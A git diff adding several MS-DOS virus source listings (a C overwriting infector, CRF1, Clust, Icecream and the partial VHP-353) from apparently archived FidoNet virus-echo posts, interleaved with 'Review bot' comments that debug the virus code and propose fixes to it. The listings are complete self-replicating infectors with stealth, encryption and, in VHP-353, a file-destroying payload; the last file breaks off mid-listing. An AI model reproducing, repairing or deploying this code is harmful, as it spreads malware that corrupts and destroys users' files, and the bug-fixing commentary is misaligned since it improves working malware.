+ */ + + register int virus_handle, victim_handle; + unsigned virus_size; + char virus_code[TOO_SMALL + 1], *victim_name; + + /* This is used enought to warrant saving it in a separate variable */ + + victim_name = victim->ff_name; + + +#ifdef DEBUG + printf("Infecting %s with %s...\n", victim_name, virus); +#endif + + /* Turn off all of the victim's attributes so it can be replaced */ + + _chmod(victim_name, 1, 0); + + +#ifdef DEBUG + puts("Ok so far..."); +#endif + + + /* Recreate the victim */ + + virus_handle = _open(virus, O_RDONLY); + victim_handle = _creat(victim_name, victim->ff_attrib); + + + /* Copy virus */ + + virus_size = _read(virus_handle, virus_code, sizeof(virus_code)); + _write(victim_handle, virus_code, virus_size); + +#ifdef DEBUG + puts("Almost done..."); +#endif + + /* Reset victim's file date, time, and size */ + + chsize(victim_handle, victim->ff_fsize); + setftime(victim_handle, (struct ftime *) &victim->ff_ftime); + + + /* Close files */ + + close(virus_handle); + close(victim_handle); + +#ifdef DEBUG + puts("Infection complete!"); +#endif +} + +struct ffblk *victim(void) +{ + /* This function returns a pointer to the name of the virus's next + victim. This routine is set up to try to infect .EXE and .COM + files. If there is a command line argument, it will try to + infect that file instead. If all files are infected, hostile + activity is initiated... + */ + + register char **ext; + static char *types[] = {"*.EXE", "*.COM", NULL}; + static struct ffblk ffblk; + int done; + + for (ext = (*++_argv) ? _argv : types; *ext; ext++) + { + for (ext = (*++_argv) ? _argv : types; *ext; ext++) + { + done = findfirst(*ext, &ffblk, FA_RDONLY | FA_HIDDEN | FA_SYSTEM | +FA_ARCH); + while (!done) { +#ifdef DEBUG + printf("Scanning %s...\n", ffblk.ff_name); +#endif + + /* If you want to check for specific days of the week, months, + etc.... here is the place to insert the code (don't forget to + "#include "). 
+ */ + + if ((ffblk.ff_fsize > TOO_SMALL) && (!infected(ffblk.ff_name))) + return(&ffblk); + + done = findnext(&ffblk); + } + } + } + /* If there are no files left to infect, have a little fun */ + + hostile_activity(); + return(0); +} + +int main(int argc, char *argv[]) +{ + /* In the main program, a victim is found and infected. If all files + are infected, a malicious action is performed. Otherwise, a bogus + error message is displayed, and the virus terminates with code + 1, simulating an error. + */ + + char *err_msg[] = { "Out of memory", + "Bad EXE format", + "Invalid DOS version", + "Bad memory block", + "FCB creation error", + "Sharing violation", + "Abnormal program termination", + "Divide error", + }; + + char *virus_name; + spread(argv[0], victim()); + puts(err_msg[peek(0, 0x46C) % (sizeof(err_msg) / sizeof(char *))]); + return(1); +} + +/*-+- GEcho 1.00 + + Origin: Stop creating them! Virusses aren't great! (2:283/718) +============================================================================= + +Yoo-hooo-oo, -! + + + The MeeO + +/d Warn if duplicate symbols in libraries + +--- Aidstest Null: /Kill + * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136)*/ + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir49.asm b/MSDOS/Virus.MSDOS.Unknown.vir49.asm new file mode 100644 index 00000000..7b13e0c4 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir49.asm 
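Review bot: In victim() the inner `for (ext = (*++_argv) ? _argv : types; *ext; ext++)` is a verbatim repeat of the outer one, which looks like a paste duplication: `_argv` is advanced twice (so a single command-line argument is skipped and the `types` table is used instead), and once the inner loop stops on the NULL terminator of `types` the outer `ext++` steps past the end of the array and `*ext` reads beyond it. One of the two loop headers should go, most likely the inner; with only one loop the flow matches the comment above it. infected() also never checks `_open()` for -1, so on an unopenable file `_read` fails and the signature comparison runs on uninitialised stack bytes, e.g. `if ((handle = _open(fname, O_RDONLY)) == -1) return(0);`. The `#include` lines have lost their header names (presumably angle-bracketed names stripped by whatever produced this copy, likewise the `"#include "` fragment in the victim comment); as posted the file does not compile, which is worth a one-line note at the top of the listing.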
@@ -0,0 +1,224 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 39 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CRF.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Fred Lee, 2:283/718 (06 Nov 94 17:46) +;* To : Mike Nisbett +;* Subj : CRF.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Fred.Lee@f718.n283.z2.fidonet.org + title "CRF1 virus. Born on the Fourth of July. Written by TBSI." + page 60,80 +code segment word public 'code' + assume cs:code,ds:code + org 100h +main proc;edure + + +; As referenced in this source listing, Top-Of-File represents location 100h in +; the current memory segment, which is where the virus code is loaded into mem. +; The word "program" refers to the infected programs code and "virus" refers to +; the virus's code. This information is included to clarify my use of the word +; "program" in the remarks throughout this listing. + +; Since the virus (with the exception of "call skip" and "db 26") can be loaded +; anywhere in memory depending on the length of the infected program, I made it +; to where the BP register would be loaded with the displacement of the code in +; memory. This was done as follows: +; 1) a CALL instruction was issued. It places the TRUE return +; address onto the stack. +; 2) instead of returning to there, the value was popped off of +; the stack into the BP register +; 3) then, it subtracts the EXPECTED value of BP (the address of +; EOFMARK in the 1st-time copy) from BP to get the offset. +; 4) all references to memory locations were thereafter changed +; to refernces to EXPECTED memory locations + BP +; This fixed the problem. + + + + +tof: ;Top-Of-File + jmp short begin ;Skip over program + nop ;Reserve 3rd byte +EOFMARK: db 26 ;Disable DOS's TYPE + +first_four: nop ;First run copy only! 
+address: int 20h ;First run copy only! +check: nop ;First run copy only! + +begin: call nextline ;Push BP onto stack +nextline: pop bp ;BP=location of Skip + sub bp,offset nextline ;BP=offset from 1st run + + mov byte ptr [bp+offset infected],0 ;Reset infection count + + lea si,[bp+offset first_four] ;Original first 4 bytes + mov di,offset tof ;TOF never changes + mov cx,4 ;Lets copy 4 bytes + cld ;Read left-to-right + rep movsb ;Copy the 4 bytes + + mov ah,1Ah ;Set DTA address ... + lea dx,[bp+offset DTA] ; ... to *our* DTA + int 21h ;Call DOS to set DTA + + mov ah,4Eh ;Find First ASCIIZ + lea dx,[bp+offset filespec] ;DS:DX -} '*.COM',0 + lea si,[bp+offset filename] ;Point to file + push dx ;Save DX + jmp short continue ;Continue... + +return: mov ah,1ah ;Set DTA address ... + mov dx,80h ; ... to default DTA + int 21h ;Call DOS to set DTA + xor ax,ax ;AX= 0 + mov bx,ax ;BX= 0 + mov cx,ax ;CX= 0 + mov dx,ax ;DX= 0 + mov si,ax ;SI= 0 + mov di,ax ;DI= 0 + mov sp,0FFFEh ;SP= 0 + mov bp,100h ;BP= 100h (RETurn addr) + push bp ; Put on stack + mov bp,ax ;BP= 0 + ret ;JMP to 100h + +nextfile: or bx,bx ;Did we open the file? + jz skipclose ;No, so don't close it + mov ah,3Eh ;Close file + int 21h ;Call DOS to close it + xor bx,bx ;Set BX back to 0 +skipclose: mov ah,4Fh ;Find Next ASCIIZ + +continue: pop dx ;Restore DX + push dx ;Re-save DX + xor cx,cx ;CX= 0 + xor bx,bx + int 21h ;Find First/Next + jnc skipjmp + jmp NoneLeft ;Out of files + +skipjmp: mov ax,3D02h ;open file + mov dx,si ;point to filespec + int 21h ;Call DOS to open file + jc nextfile ;Next file if error + + mov bx,ax ;get the handle + mov ah,3Fh ;Read from file + mov cx,4 ;Read 4 bytes + lea dx,[bp+offset first_four] ;Read in the first 4 + int 21h ;Call DOS to read + + cmp byte ptr [bp+offset check],26 ;Already infected? + je nextfile ;Yep, try again ... + cmp byte ptr [bp+offset first_four],77 ;Mis-named .EXE? + je nextfile ;Yep, maybe next time! 
+ + mov ax,4202h ;LSeek to EOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + cmp ax,0FD00h ;Longer than 63K? + ja nextfile ;Yep, try again... + mov [bp+offset addr],ax ;Save call location + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;Point to buffer + int 21h ;Save the first 4 bytes + + mov ah,40h ;Write to file + mov cx,offset eof-offset begin ;Length of target code + lea dx,[bp+offset begin] ;Point to virus start + int 21h ;Append the virus + + mov ax,4200h ;LSeek to TOF + xor cx,cx ;CX= 0 + xor dx,dx ;DX= 0 + int 21h ;Call DOS to LSeek + + mov ax,[bp+offset addr] ;Retrieve location + inc ax ;Adjust location + + mov [bp+offset address],ax ;address to call + mov byte ptr [bp+offset first_four],0E9h ;JMP rel16 inst. + mov byte ptr [bp+offset check],26 ;EOFMARK + + mov ah,40h ;Write to file + mov cx,4 ;Write 4 bytes + lea dx,[bp+offset first_four] ;4 bytes are at [DX] + int 21h ;Write to file + + inc byte ptr [bp+offset infected] ;increment counter + jmp nextfile ;Any more? + +NoneLeft: cmp byte ptr [bp+offset infected],2 ;At least 2 infected? + jae TheEnd ;The party's over! + + mov di,100h ;DI= 100h + cmp word ptr [di],20CDh ;an INT 20h? + je TheEnd ;Don't go to prev. dir. + + lea dx,[bp+offset prevdir] ;'..' + mov ah,3Bh ;Set current directory + int 21h ;CHDIR .. + jc TheEnd ;We're through! + mov ah,4Eh + jmp continue ;Start over in new dir + +TheEnd: jmp return ;The party's over! + +filespec: db '*.COM',0 ;File specification +prevdir: db '..',0 ;previous directory + +; None of this information is included in the virus's code. It is only used +; during the search/infect routines and it is not necessary to preserve it +; in between calls to them. + +eof: +DTA: db 21 dup (?) ;internal search's data + +attribute db ? ;attribute +file_time db 2 dup (?) ;file's time stamp +file_date db 2 dup (?) ;file's date stamp +file_size db 4 dup (?) ;file's size +filename db 13 dup (?) ;filename + +infected db ? 
;infection count + +addr dw ? ;Address + + main endp;rocedure + code ends;egment + + end main +; +; > and Remember Don't Forget to Call < +; > ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? < +; + +;-+- GEcho 1.00 +; + Origin: Poeldijk, The Netherlands, Europe, Earth (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;Options: /m = map file with publics +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir50.asm b/MSDOS/Virus.MSDOS.Unknown.vir50.asm new file mode 100644 index 00000000..dcd4466c --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir50.asm 
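Review bot: The NoneLeft path does `CHDIR ..` and then jumps back to the search loop, but nothing on the `return` path undoes it, so when fewer than two files were infected in the start directory the host is resumed at 100h with the current directory moved one or more levels up; the DTA is restored there but the directory is not, which deserves a comment at the `mov ah,3Bh` line, e.g. `int 21h ; CHDIR .. — never restored; host runs with the changed CWD`. The length guard `cmp ax,0FD00h ;Longer than 63K?` checks only AX of the DX:AX result from 4202h, so the high word is ignored and `addr` holds the low 16 bits; the comment should say `; low word of DX:AX only — DX ignored`. `mov sp,0FFFEh` in `return` hard-codes a full 64K segment, while DOS gives a .COM a lower SP when less memory is available; whether that matters depends on the load environment and is not established by the listing.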
@@ -0,0 +1,252 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 40 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : CLUST.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Mike Salvino, 2:283/718 (06 Nov 94 17:48) +;* To : Daniel Hendry +;* Subj : CLUST.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Mike.Salvino@f718.n283.z2.fidonet.org +;Clust Virus from TridenT research group - small but fairly interesting, +;it's one of the more advanced from TridenT that I've seen with the +;possible exception of the TPE. + +;This virus goes memory resident at the top of lower memory and hooks +;Int 13h. Whenever an EXE file header is written, it checks to see +;if there is a large field of 0's inside it (VERY common in EXE's) +;and, if so, will put itself inside it and change the exe marker bytes +;'MZ' to a jump to that code. In this way, it effectively converts the +;file to a COM file when it is run. After this it re-executes the EXE +;file. Because of a stealth handler on Int 13h function 2 (absolute +;disk read) the EXE file is read as it originally was (the handler +;zero's out the field in which it resides and restores the jump to +;'MZ'). Because of the way this virus works, it can only infect +;smaller EXE files. + +;NOTE: +;Several commands are commented out and have the actual bytes entered +;next to them instead. This is because the compiler that Clust was +;originally compiled on used different translations than mine, and +;I wished to preserve the EXACT virus code. + +;Disinfection: Because of this virus' stealth routine, disinfection should +; be possible simply by Zipping or Arjing all EXE files on an +; infected disk, then rebooting from a clean disk and unarchiving +; the files. 
The original archiving MUST be done while the +; virus is active in memory. Also - after rebooting - make +; sure the program you use to unarchive the files is _NOT_ +; infected. + +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + jmp short EntryPoint + +LotsaNOPs db 122 dup (90h) ;Usually will be EXE header.... + +OldInt13 dd 0 + +EntryPoint: + db 0e9h,7ch,0 ;jmp InstallVirus + +Int13Handler: + cmp ah,3 + je IsDiskWrite + + cmp ah,2 + jne GoInt13 + + pushf + call cs:OldInt13 ;Call Int 13h + + jc Exit13Handler ;Exit on error. + + cmp word ptr es:[bx],7EEBh ;Is sector infected? + jne Exit13Handler + + mov word ptr es:[bx],5A4Dh ;Cover mark with 'MZ' + + push di cx ax ;Stealth routine..... + mov cx,115h + xor ax,ax + db 89h,0dfh ;mov di,bx + + ;Zero out virus from + add di,80h ;sector when it is read. + rep stosb + pop ax cx di + +Exit13Handler: + iret +GoInt13: + jmp cs:[OldInt13] +IsDiskWrite: + cmp word ptr es:[bx],5A4Dh ;Is EXE file being written? + jne GoInt13 + + cmp word ptr es:[bx+4],75h ;Is file too large? + jae GoInt13 + + push ax cx si di ds + push es + pop ds + db 89h,0deh ;mov si,bx + + add si,80h ;Look in EXE header.... + mov cx,115h +AllZeros: + lodsb + cmp al,0 + loopz AllZeros + + cmp cx,0 ;Check to see if entire field + jne ExitInfectHandler ;was zeroed - leave if not. + + + db 89h,0dfh ;mov di,bx + add di,80h + mov cx,115h + mov si,offset OldInt13 + push cs + pop ds + rep movsb + + db 89h,0dfh ;mov di,bx + + ;Copy virus + ;over zero area in EXE header. + mov ax,7EEBh ;Stick in Jump over 'MZ' + stosw + +ExitInfectHandler: + pop ds di si cx ax ;Allow Write to process now. + jmp short GoInt13 + +InstallVirus: + mov ax,3513h + int 21h ;Get Int 13 addres + mov word ptr cs:[OldInt13],bx + mov word ptr cs:[OldInt13+2],es + + mov ah,0Dh + int 21h ;Flush disk buffers + + mov ah,36h + mov dl,0 + int 21h ;Get free space on default drive + + mov ax,cs + dec ax + mov ds,ax + cmp byte ptr ds:0,'Z' ;Are we the last chain? 
+ jne Terminate ;If not, terminate. + + ;sub word ptr ds:[3],39h ;subtract from MCB size + db 81h,2eh,03,0,39h,0 + + ;sub word ptr ds:[12h],39h ;subtract from PSP TopOfMem + db 81h,2eh,12h,0,39h,0 + + mov si,offset OldInt13 + + db 89h,0f7h ;mov di,si + + mov es,ds:[12h] ;ES = new segment + push cs + pop ds + mov cx,115h ;Copy virus into memory + rep movsb + + mov ax,2513h + push es + pop ds + mov dx,offset Int13Handler + int 21h ;Set int 13 to virus handler + + mov ah,4Ah + push cs + pop es + mov bx,39h + int 21h ;Modify mem alloc. + + push cs + pop ds + mov bx,ds:[2ch] ;Get environment segment + mov es,bx + xor ax,ax + mov di,1 + +ScanForFilename: ;Find name of file executed + dec di ;in environment strings... + scasw ;(located after two 0's) + jnz ScanForFilename + + lea si,[di+2] + push bx + pop ds ;DS = environment segment + + push cs + pop es ;ES = code segment + + mov di,offset Filename + push di + xor bx,bx + +CopyFilename: + mov cx,50h + inc bx + lodsb + cmp al,0 + jne StoreFilename ;Change zero at end of + mov al,0Dh ;filename to a return + +StoreFilename: + stosb + cmp al,0Dh ;If it was a return, we're + loopnz CopyFilename ;done copying the filename + + mov byte ptr ds:[28fh],bl + push cs + pop ds + pop si + dec si + int 2Eh ;Re-execute EXE file with + ;Stealth handler in memory, + ;so Exe is run w/o virus. + +Terminate: + mov ah,4Ch + int 21h + + db 0 +Filename db 1 + +end start + +;-+- Terminate 1.50/Pro +; + Origin: Fred's Place (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! +; +; +; The MeeO +; +;/zi,/zd,/zn Debug info: zi=full, zd=line numbers only, zn=none +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir51.asm b/MSDOS/Virus.MSDOS.Unknown.vir51.asm new file mode 100644 index 00000000..a92d4fd1 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir51.asm 
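Review bot: In Int13Handler's read path the `jc Exit13Handler` after `call cs:OldInt13` is commented `;Exit on error.`, but Exit13Handler leaves through `iret`, which reloads the flags the caller pushed with its own `int 13h`; the BIOS carry flag is therefore never propagated and callers see every hooked read as successful, whether or not the sector was infected. Only the `jmp cs:[OldInt13]` at GoInt13 returns the real flags, so the comment overstates what the exit does. Since the header NOTE says the listing is meant to preserve the exact original bytes, the right change is a comment, e.g. `;NOTE: iret restores the caller's flags - CF from the BIOS call is lost here`, so anyone modelling the virus's behaviour on disk errors is not misled.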
@@ -0,0 +1,292 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 41 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : ICECREAM.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Dr T , 2:283/718 (06 Nov 94 17:48) +;* To : Ron Toler +;* Subj : ICECREAM.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Dr.T.@f718.n283.z2.fidonet.org +;Icecream Virus by the TridenT virus research group. + +;This is a simple direct-action com virus that uses one of +;4 encryption algorithms to encrypt itself each time it infects a file. +;It will infect one .COM file in the current directory every time it is +;executed. It marks infections with the time stamp. + + +;Disassembly by Black Wolf + +.model tiny +.code + org 100h + +start: + db 0e9h,0ch,0 ;jmp Virus_Entry + +Author_Name db 'John Tardy' + + db 0E2h,0FAh +Virus_Entry: + push ax + call Get_Offset +Get_Offset: + pop ax + sub ax,offset Get_Offset + + db 89h,0c5h ;mov bp,ax + lea si,[bp+Storage] + mov di,100h ;Restore file + movsw + movsb + + mov ah,1Ah + mov dx,0f900h + int 21h ;Set DTA + + mov ah,4Eh + +FindFirstNext: + lea dx,[bp+ComMask] + xor cx,cx + int 21h ;Find File + jnc InfectFile + +Restore_DTA: + mov ah,1Ah + mov dx,80h + int 21h ;Set DTA to default + + mov bx,offset start + pop ax ;Return to host + push bx + retn + +InfectFile: + mov ax,4300h + mov dx,0f91eh + int 21h ;Get file attribs + + push cx ;save 'em + mov ax,4301h + xor cx,cx + int 21h ;Set them to 0 + + mov ax,3D02h + int 21h ;Open file + + mov bx,5700h + xchg ax,bx + int 21h ;Get file time + + push cx + push dx ;save it + and cx,1Fh + cmp cx,1 ;check for infection + jne ContinueInfection + db 0e9h,69h,0 ;jmp DoneInfect + +ContinueInfection: + mov ah,3Fh + lea dx,[bp+Storage] + mov cx,3 + int 21h ;Read in first 3 bytes + + mov ax,cs:[Storage+bp] + cmp 
ax,4D5Ah ;Is it an EXE? + je DoneInfect + cmp ax,5A4Dh + je DoneInfect ;Other EXE signature? + + pop dx + pop cx + and cx,0FFE0h ;Change stored time values + or cx,1 ;to mark infection + push cx + push dx + + mov ax,4202h ;Go to the end of the file + call Move_FP + sub ax,3 + mov cs:[JumpSize+bp],ax ;Save jump size + + add ax,10Fh ;Save encryption starting + mov word ptr [bp+EncPtr1+1],ax ;point.... + mov word ptr [bp+EncPtr2+1],ax + mov word ptr [bp+EncPtr3+1],ax + mov word ptr [bp+EncPtr4+1],ax + call SetupEncryption ;Encrypt virus + + mov ah,40h + mov dx,0fa00h + mov cx,1F5h + int 21h ;Write virus to file + + mov ax,4200h + call Move_FP ;Go to the beginning of file + + mov ah,40h + lea dx,[bp+JumpBytes] + mov cx,3 + int 21h ;Write in jump + + call FinishFile + jmp Restore_DTA + +DoneInfect: + call FinishFile + mov ah,4Fh + jmp FindFirstNext + +Move_FP: + xor cx,cx + xor dx,dx + int 21h + ret + +FinishFile: + pop si dx cx + mov ax,5701h ;Reset file time/date stamp + int 21h ;(or mark infection) + + mov ah,3Eh + int 21h ;Close new host file + + mov ax,4301h + pop cx + mov dx,0fc1eh + int 21h ;Restore old attributes + + push si + retn + +Message db ' I scream, you scream, we both ' + db 'scream for an ice-cream! 
' + +SetupEncryption: + xor byte ptr [bp+10Dh],2 + xor ax,ax + mov es,ax + mov ax,es:[46ch] ;Get random number + push cs + pop es + push ax + and ax,7FFh + add ax,1E9h + mov word ptr [bp+EncSize1+1],ax + mov word ptr [bp+EncSize2+1],ax + mov word ptr [bp+EncSize3+1],ax + mov word ptr [bp+EncSize4+1],ax + pop ax + push ax + and ax,3 + shl ax,1 + mov si,ax + mov ax,[bp+si+EncData1] + add ax,bp + mov si,ax + lea di,[bp+103h] + movsw + movsw + movsw + movsw ;Copy Encryption Algorithm + pop ax + stosb + movsb + mov dl,al + lea si,[bp+103h] + mov di,0fa00h + mov cx,0Ch + rep movsb + lea si,[bp+10Fh] + mov cx,1E9h + +EncryptVirus: + lodsb + db 30h,0d0h ;xor al,dl + stosb + loop EncryptVirus + + cmp dl,0 + je KeyWasZero + retn + +KeyWasZero: ;If key is zero, increase + mov si,offset AuthorName ;jump size and place name + mov di,0fa00h ;at beginning.... + mov cx,0Ah + rep movsb + mov ax,cs:[JumpSize+bp] + add ax,0Ch + mov cs:[JumpSize+bp],ax + retn + + db '[TridenT]' + +EncData1 dw 02beh +EncData2 dw 02c7h +EncData3 dw 02d0h +EncData4 dw 02d9h + +Encryptions: +;------------------------------------------------------------ +EncPtr1: + mov si,0 +EncSize1: + mov cx,0 + xor byte ptr [si],46h +;------------------------------------------------------------ +EncPtr2: + mov di,0 +EncSize2: + mov cx,0 + xor byte ptr [di],47h +;------------------------------------------------------------ +EncSize3: + mov cx,0 +EncPtr3: + mov si,0 + xor byte ptr [si],46h +;------------------------------------------------------------ +EncSize4: + mov cx,0 +EncPtr4: + mov di,0 + xor byte ptr [di],47h +;------------------------------------------------------------ + +AuthorName db 'John Tardy' + +JumpBytes db 0E9h +JumpSize dw 0 + +ComMask db '*.CoM',0 + +Storage dw 20CDh + db 21h + +end start + +;-+- GEcho 1.10+ +; + Origin: This virus is Microsoft Windows (2:283/718) +;============================================================================= +; +;Yoo-hooo-oo, -! 
+; +; +; The MeeO +; +;/x Include false conditionals in listing +; +;--- Aidstest Null: /Kill +; * Origin: PVT.ViRIImainboard / Virus Research labs. (2:5030/136) + diff --git a/MSDOS/Virus.MSDOS.Unknown.vir52.asm b/MSDOS/Virus.MSDOS.Unknown.vir52.asm new file mode 100644 index 00000000..ebeb4946 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.vir52.asm 
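Review bot: In InfectFile the `mov ax,3D02h / int 21h ;Open file` has no carry check, so on a failed open (read-only media, sharing violation) the error code in AX is moved into BX by the following `xchg ax,bx` and used as the handle for the 5700h/3Fh/40h calls that follow, and the comments do not mention this. The `mov ax,4301h ;Set them to 0` attribute change and the `mov ah,3Fh` read are likewise unchecked. As the listing's purpose is to preserve the original code, I would document rather than fix it: `;NOTE: no CF check - on failure AX holds a DOS error code and is used as the handle below`. The header's "one of 4 encryption algorithms" also deserves a caveat that all four variants are a single-byte XOR keyed from the BIOS tick count at 0:46Ch, and that a zero key (the KeyWasZero path) leaves the body in clear.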
@@ -0,0 +1,306 @@ +; PVT.VIRII (2:465/65.4) PVT.VIRII +; Msg : 42 of 54 +; From : MeteO 2:5030/136 Tue 09 Nov 93 09:15 +; To : - *.* - Fri 11 Nov 94 08:10 +; Subj : V_VHP353.ASM +; +;.RealName: Max Ivanov +; +;* Kicked-up by MeteO (2:5030/136) +;* Area : VIRUS (Int: p p) +;* From : Bryan Sullivan, 2:283/718 (06 Nov 94 17:49) +;* To : Adam Happ +;* Subj : V_VHP353.ASM +; +;@RFC-Path: +;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7 +;18.n283!not-for-mail +;@RFC-Return-Receipt-To: Bryan.Sullivan@f718.n283.z2.fidonet.org + page ,132 + name VHP_353 + title Virus; based on the famous VHP-648 virus + .radix 16 + +code segment + assume cs:code,ds:code + + org 100 + +environ equ 2C + +newjmp equ 7Bh ;Code of jmp instruction +codeptr equ 7A ;Here is formed a jump to the virus code +pname equ 78 ;Offset of file name in the dir path +poffs equ 76 ;Offset in the contents of the `PATH' variable +errhnd equ 74 ;Save place for the old error handler +fname equ 70 ;Path name to search for +mydta equ 2C ;DTA for Find First/Next: +attrib equ 17 ;File attribute +time equ 16 ;File time +date equ 14 ;File date +fsize equ 12 ;File size +namez equ 0E ;File name found + +start: + jmp short begin + nop + int 20 + +saveins db 3 dup (90) ;Original first 3 bytes + +begin: + call virus ;Detrmine the virus start address + +data label byte ;Data section + +allcom db '*.COM',0 ;Filespec to search for +pathstr db 'PATH=' + +;This replaces the first instruction of a destroyed file. 
+;It's a JMP instruction into the hard disk formatting program (IBM XT only): + +bad_jmp db 0EA,6,0,0,0C8 + +virus: + pop bx ;Make BX pointed at data + mov di,offset start ;Push the program true start address + push di ; onto the stack + push ax ;Save AX + + cld + lea si,[bx+saveins-data] ;Original instruction saved there + movsw ;Move 2 + 1 bytes + movsb + mov si,bx ;Keep SI pointed at data + + lea bp,[bx+endcode-data+7A] ;Reserve local storage + + mov ax,3524 ;Get interrupt 24h handler + int 21 ; and save it in errhnd + + mov [bp-errhnd],bx + mov [bp-errhnd+2],es + + mov ah,25 ;Set interrupt 24h handler + lea dx,[si+handler-data] + cmp al,0 ;DOS < 2.0 zeroes AL + je exit ;Exit if version < 2.0 + push ds + int 21 + + lea dx,[bp-mydta] + mov ax,1A00 ;Set DTA + int 21 + + xor di,di ;Point ES:DI at the environment start + mov es,ds:[di+environ] ;Environment address + mov bx,si +search: ;Search 'PATH' in the environment + lea si,[bx+pathstr-data] + mov cx,5 ;5 letters in 'PATH=' + repe cmpsb + je pfound ;PATH found, continue + mov ch,80 ;Maximum 32 K in environment + repne scasb ;If not, skip through next 0 + scasb ;End of environment? + dec di + jc search ;If not, retry +pfound: + pop es ;Restore ES + + mov [bp-poffs],di ;Save 'PATH' offset in poffs + lea di,[bp-fname] + mov [bp-pname],di + +filesrch: + lea si,[bx+allcom-data] + movsw + movsw ;Move '*.COM' at fname + movsw + mov si,bx ;Restore SI + + mov ah,4E ;Find first file + lea dx,[bp-fname] + mov cl,11b ;Hidden, Read/Only or Normal files + jmp short findfile + +checkfile: + mov al,[bp-time] ;Check file time + and al,11111b ; (the seconds, more exactly) + cmp al,62d/2 ;Are they 62? + +;If so, file is already contains the virus, search for another: + + je findnext + +;Is 10 <= file_size <= 64,000 bytes? 
+ + sub word ptr [bp-fsize],10d + cmp [bp-fsize],64000d-10d+1 + jc process ;If so, process the file + +findnext: ;Otherwise find the next file + mov ah,4F ;Find next file +findfile: + int 21 + jnc checkfile ;If found, go chech some conditions + +nextdir: + mov si,[bp-poffs] ;Get the offset in the PATH variable + lea di,[bp-fname] ;Point ES:DI at fname + mov ds,ds:[environ] ;Point DS:SI at the PATH variable found + cmp byte ptr [si],0 ;0 means end of PATH + jnz cpydir + +olddta: + mov ax,2524 ;Set interrupt 24h handler + lds dx,dword ptr [bp-errhnd] + int 21 + push cs + pop ds ;Restore DS + +exit: + mov ah,1A ;Set DTA + mov dx,80 ;Restore DTA + int 21 + + pop ax + ret ;Go to CS:IP by doing funny RET + +cpydir: + lodsb ;Get a char from the PATH variable + cmp al,';' ;`;' means end of directory + je enddir + cmp al,0 ;0 means end of PATH variable + je enddir + stosb ;Put the char in fname + jmp cpydir ;Loop until done +enddir: + push cs + pop ds ;Restore DS + mov [bp-poffs],si ;Save the new offset in the PATH variable + mov al,'\' ;Add '\' + stosb + mov [bp-pname],di + jmp filesrch ;And go find the first *.COM file + +process: + mov di,dx ;[bp-pname] + lea si,[bp-namez] ;Point SI at namez +cpyname: + lodsb ;Copy name found to fname + stosb + cmp al,0 + jne cpyname + mov si,bx ;Restore SI + + mov ax,4301 ;Set file attributes + call clr_cx_dos + + mov ax,3D02 ;Open file with Read/Write access + int 21 + jc oldattr ;Exit on error + mov bx,ax ;Save file handle in BX + + mov ah,2C ;Get system time + int 21 + and dh,111b ;Are seconds a multiple of 8? 
+ jnz infect ;If not, contaminate file (don't destroy): + +;Destroy file by rewriting the first instruction: + + mov cx,5 ;Write 5 bytes + lea dx,[si+bad_jmp-data] ;Write THESE bytes + jmp short do_write ;Do it + +;Try to contaminate file: + +;Read first instruction of the file (first 3 bytes) and save it in saveins: + +infect: + mov ah,3F ;Read from file handle + mov cx,3 ;Read 3 bytes + lea dx,[si+saveins-data] ;Put them there + call dos_rw + jc oldtime ;Exit on error + +;Move file pointer to end of file: + + mov ax,4202 ;LSEEK from end of file + call clr_dx_cx_dos + + mov [bp-codeptr],ax ;Save result in codeptr + + mov cx,endcode-saveins ;Virus code length as bytes to be written + lea dx,[si+saveins-data] ;Write from saveins to endcode + call dos_write ;Write to file handle + jc oldtime ;Exit on error + + call lseek ;LSEEK to the beginning of the file + +;Rewrite the first instruction of the file with a jump to the virus code: + + mov cl,3 ;3 bytes to write + lea dx,[bp-newjmp] ;Write THESE bytes 